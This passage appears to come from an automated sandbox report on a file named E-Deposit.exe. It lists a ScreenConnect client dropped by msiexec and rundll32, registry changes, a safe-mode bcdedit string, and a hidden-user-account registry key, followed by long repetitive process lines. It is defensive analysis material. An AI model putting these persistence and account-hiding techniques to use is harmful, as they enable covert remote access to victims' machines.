                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSICCC5.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID590.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID7B3.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID590.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID7B3.tmpJump to dropped file
                                  Source: ScreenConnect.ClientService.dll.2.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (484f9eed1d8e13b9)Jump to behavior

                                  Hooking and other Techniques for Hiding and Protection

                                  barindex
                                  Contains functionality to hide user accounts
                                  Source: E-Deposit.exe, 00000000.00000002.1698037644.0000000005A70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: E-Deposit.exe, 00000000.00000000.1666529785.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: rundll32.exe, 00000004.00000003.1683493567.000000000427B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3520090259.0000000002A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3519460031.0000000002800000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3519662167.0000000002952000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3539290767.000000001B812000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: E-Deposit.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.ClientService.dll.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.Windows.dll.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.Windows.dll.4.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
